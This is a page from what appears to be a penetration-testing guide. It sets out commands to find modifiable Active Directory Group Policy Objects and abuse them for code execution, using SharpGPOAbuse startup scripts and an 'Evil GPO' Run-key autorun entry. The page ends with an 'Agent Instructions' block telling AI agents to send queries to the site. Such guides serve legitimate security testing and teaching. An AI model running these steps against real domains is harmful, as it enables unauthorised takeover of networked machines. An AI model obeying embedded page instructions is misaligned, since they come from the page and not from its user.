# GPOs

## Introduction

A GPO (Group Policy Object) is a collection of settings that define how computers and users on a network should behave. GPOs are used to enforce security policies, configure system settings, and manage software installations across multiple computers in an organization.

If domain users can modify a GPO, it can lead to several problems like having RCE on a machine.

## Modifiable GPOs

1\. Enumerate modifiable GPOs 

```powershell
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}" }
```

2\. If there is any, resolve its GPO name and the SID of the principal.

```powershell
Get-DomainGPO -Identity "<ObjectDN>" | select displayName, gpcFileSysPath
ConvertFrom-SID <SecurityIdentifier>
```

3\. Find out the OU where the GPO appears.

```powershell
Get-DomainOU -GPLink "{RelativeDN}" | select distinguishedName
```

4\. Get the computer where the GPO applies.

```powershell
Get-DomainComputer -SearchBase "<OU_distinguishedname>" | select dnsHostName
```

5\. Modify the GPO

```bash
.\SharpGPOAbuse.exe --AddComputerScript --ScriptName startup.bat --ScriptContents "<SCRIPT_CONTENT>" --GPOName "<GPO_NAME>"
```

6\. Wait for the GPO to take effect (20 minutes or so).

## Principals with Create groupPolicyContainer objects privilege

1\. Enumerate principals (Users/groups) that can create new GPOs in the domain.

```powershell
Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }
```

2\. Look for OUs with "WriteProperty" on the attribute "GP-LINK".

3\. Become the principal and create a GPO

> :information\_source:Because we are using the autorun key registry, the workstation must be restarted so the payload is executed.

```powershell
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "<COMMAND>" -Type ExpandString
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-pentesting-guide.marmeus.com/active-directory/gpos.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.